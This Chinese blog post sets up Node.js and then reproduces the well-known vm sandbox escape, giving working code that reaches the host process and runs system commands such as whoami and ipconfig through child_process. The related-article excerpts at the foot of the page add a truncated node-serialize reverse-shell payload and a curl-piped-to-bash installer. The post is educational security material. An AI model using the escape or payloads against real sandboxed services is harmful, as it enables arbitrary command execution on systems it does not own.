安全杂记 - 复现nodejs沙箱绕过

最新推荐文章于 2024-09-09 17:43:45 发布
最新推荐文章于 2024-09-09 17:43:45 发布
阅读量743 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54642732/article/details/132134715
版权

目录

一. 配置环境

1.下载nodejs

官网:https://nodejs.org/en

在这里插入图片描述

2.nodejs配置

安装nodejs的msi文件,默认配置一直下一步即可,以下步骤以默认安装为准,如有安装位置改变,请自行更改环境变量里面的配置。
继续进行环境变量的配置
用户变量如下
在这里插入图片描述
系统变量如下
在这里插入图片描述
编辑PATH添加如下
在这里插入图片描述
在默认安装位置新建如下两个文件
node_cache是放安装过程的缓存文件
node_global是存放安装模块配置位置
在这里插入图片描述
测试是否安装成功
在这里插入图片描述
继续执行如下命令

npm config set prefix "C:\Program Files\nodejs\node_global"
npm config set cache "C:\Program Files\nodejs\node_cache"

安装cluster进行测试

npm install cluster -g

3.报错解决方法

如有报错请尝试给nodejs默认安装目录提升用户权限来解决。

二. nodej沙箱绕过

1. vm模块

const vm = require('vm');
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

运行结果
在这里插入图片描述

2.使用this或引用类型来进行沙箱绕过

this指向的是sandbox,我们可以获得一个tosString方法,通过toString方法来获得一个构造函数。
所有函数都是由Fuction创造出来的,我们的目的是拿到process模块
在这里插入图片描述
因为constructor本身指向它的构造函数,所以我们可以利用constructor函数,来拿到Function函数
沙盒逃逸就是要把外面的元素或者对象引入进来。
如下,此时是利用this

const vm = require('vm');
const script = `
const process = x.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;

const sandbox = { m: [], n: {}, x:/regexp/};
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

我们把“x”替换为this也是可以成功执行的,此时m和n可以是任意.,这个是利用了引用类型比如{}。


const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('ipconfig').toString()
`;

const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

whoami成功执行,代表着此时已经可以任意命令执行
在这里插入图片描述
用户learnpc是我的管理员用户
在这里插入图片描述

比如我们这里在执行以下ipconfig来进行验证
在这里插入图片描述
以上便是经典的沙箱逃逸来执行命令,当我们可以执行命令的时候,便说明我们其实已经成功拿下。此时也可执行其他不好的命令。

鱼不知忆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-5941 (nodejs 代码执行)
beirry的博客
11-24 1221
vulfocus-nodejs 代码执行 (CVE-2017-5941) 复现环境 攻击机(192.168.95.58) 靶场环境(10.3.61.69) 复现过程 在含有nc文件目录下打开两个cmd,监听8888端口 nc -lvp [端口] 访问环境:http://10.3.61.69:55269 账号随意输入,密码构造payload如下 _$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&amp
Nodejs沙箱绕过
weixin_54347738的博客
08-03 321
A:因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的,但是,如果修改下context:{m: [], n: {}, x: /regexp/},这样m、n、x就都可以利用了。创建完两个空文件夹之后,跟之前操作一样,在键盘按下【win+R】键,输入cmd,然后回车,打开命令行界面,输入下面命令,如图。
安全基础 --- nodejs沙箱逃逸
weixin_62443409的博客
09-22 4350
因为 primitive types,数字、字符串、布尔这些都是 primitive types ,他们传递的是值,沙盒内使用的m和外部的m不是同一个m,无法利用。{} 是在沙盒内部的一个对象,而this是在沙盒外的对象(注入进来的)。沙盒内的 {} 无法获取process,因为其本身就无process。vm模块式nodejs中内置的模块,是nodejs提供给使用者的隔离环境。来引入当前上下文里没有的模块,绕过这个隔离环境
Nodejs沙箱逃逸
weixin_51525416的博客
10-01 1827
Nodejs沙箱逃逸
CVE-2021-21315 NodeJs命令注入漏洞复现
wurisansheng的博客
10-11 1304
一、简介: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http包含了和http相关的很多函数,帮助开发者对http、tcp、udp等进行操作或创建相关服务器。 二、漏洞描述: Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统
yum install -y nodejs 报错问题及centos环境nodejs安装解决方案
ijiahong的博客
10-22 3442
直接yum install -y nodejs会提示找不到nodejs这个模块,参考官网,发现有以下俩种安装方式: 1、安装nodesource后再执行yum install -y nodejs curl --silent --location https://rpm.nodesource.com/setup_8.x | sudo bash - 或者 curl --silent --loca...
Node.js笔记-使用nodejs-websocket构建WebSocket服务
IT1995的博客
11-09 3685
首先安装nodejs-websocket npm install nodejs-websocket 构造如下程序: wsServer.js var ws = require("nodejs-websocket") var PORT = 3000 var server = ws.createServer(function (conn) { console.log("New connection") conn.on("text", function (str) {
NodeJS入门(一)---nodejs详细安装步骤
热门推荐
muzidigbig的博客
05-29 36万+
初学NodeJS,就是要弄清楚什么是nodejs,能做什么,怎么用。。什么是nodejs? 脚本语言需要一个解析器才能运行,JavaScript是脚本语言,在不同的位置有不一样的解析器,如写入html的js语言,浏览器是它的解析器角色。而对于需要独立运行的JSnodejs就是一个解析器。 每一种解析器都是一个运行环境,不但允许js定义各种数据结构,进行各种计算,还允许js使用允许环境提...
使用 alipay-sdk-nodejsnode 应用接入支付宝付款
u012925833的博客
10-22 9591
1. 开发构思 我们的总体需求是让 node js 应用接入支付宝,完成用户付款,具体流程是: 当用户在商户应用点击付款后,页面跳转到支付宝界面,这时会出现两种情况: 手机用户唤醒支付宝应用 PC 唤醒支付宝收银台 用户在支付宝页面进行付款,并完成付款 支付宝检测用户完成付款后向商户应用发送一个 POST 请求作为支付完成的异步回调 商户应用对回调信息进行验证后,对订单状态进行变更 用户返...
Noder-简单的基于Docker的NodeJS沙箱
08-10
Noder -简单的,基于Docker的NodeJS沙箱。用于测试代码并包含一个编辑器
rh-nodejs6-nodejs-asn1-0.2.3-2.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
rocketmq-client-nodejs:Apache RocketMQ Node.js客户端
05-03
适用于Node.js的RocketMQ客户端 这个官方的Node.js客户端是围绕 (一种经过微调的CPP客户端)的轻量级包装。 注意1:此客户端仍处于dev版本。 在生产中请谨慎使用。 注意2:该SDK现在仅支持macOS和Ubuntu 14.04 ...
influxdb-nodejs:简单的influxdb客户端
05-17
influxdb-nodejs Node.js客户端。 安装 $ npm install influxdb - nodejs 例子 查看目录以获取工作示例。 原料药 新客户 // no auth const Influx = require ( 'influxdb-nodejs' ) ; const client = new Influx ...
零信任安全:重新思考数字世界的访问
网络研究观
09-09 499
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1234
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
最新发布
weixin_49171105的博客
09-09 284
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 373
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1109
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
nodejs-legacy nodejs
08-19
nodejs-legacy和nodejs是用于在Ubuntu系统上安装Node.js的包。nodejs-legacy是一个过渡性的软件包,用于确保在旧版本Ubuntu系统上的向后兼容性。而nodejs则是正式的Node.js软件包。在安装Node.js时,可以选择使用apt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值